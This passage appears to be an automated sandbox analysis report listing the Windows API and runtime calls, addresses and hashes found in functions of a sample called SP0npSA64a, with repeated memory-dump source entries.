                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                  • API String ID: 3648134473-3128320259
                                                                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                  • __lock.LIBCMT ref: 00417981
                                                                                    • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                    • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                    • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                  • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                  • __lock.LIBCMT ref: 004179A2
                                                                                  • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                  • String ID: KERNEL32.DLL$pI
                                                                                  • API String ID: 637971194-197072765
                                                                                  • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                  • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                  • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                  • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1938898002-0
                                                                                  • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                  • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                  • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                  • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                  APIs
                                                                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                  • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                                  • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                  • String ID:
                                                                                  • API String ID: 3771399671-0
                                                                                  • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                  • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                  • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                  • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                  • _memmove.LIBCMT ref: 0044B555
                                                                                  • _memmove.LIBCMT ref: 0044B578
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 2737351978-0
                                                                                  • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                  • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                  • __calloc_crt.LIBCMT ref: 00415246
                                                                                  • __getptd.LIBCMT ref: 00415253
                                                                                  • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                  • _free.LIBCMT ref: 0041529E
                                                                                  • __dosmaperr.LIBCMT ref: 004152A9
                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                  • String ID:
                                                                                  • API String ID: 3638380555-0
                                                                                  • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                  • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                  • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                  • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Copy$ClearErrorInitLast
                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                  • API String ID: 3207048006-625585964
                                                                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                  APIs
                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                  • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                  • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                  • _memmove.LIBCMT ref: 004656CA
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                  • WSACleanup.WSOCK32 ref: 00465762
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                  • String ID:
                                                                                  • API String ID: 2945290962-0
                                                                                  • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                  • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                  • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                  • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1457242333-0
                                                                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                  APIs
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectRegistry_memmove_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 15295421-0
                                                                                  • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                  • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                  • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                  • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                  APIs
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                  • _wcstok.LIBCMT ref: 004675B2
                                                                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                  • _wcscpy.LIBCMT ref: 00467641
                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                  • _wcslen.LIBCMT ref: 00467793
                                                                                  • _wcslen.LIBCMT ref: 004677BD
                                                                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                  • String ID: X
                                                                                  • API String ID: 780548581-3081909835
                                                                                  • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                  • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                  • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                  • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                  APIs
                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                  • CloseFigure.GDI32(?), ref: 0044751F
                                                                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                  • String ID:
                                                                                  • API String ID: 4082120231-0
                                                                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                  APIs
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                  • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2027346449-0
                                                                                  • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                  • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                  • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                  • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                  APIs
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                  • GetMenu.USER32 ref: 0047A703
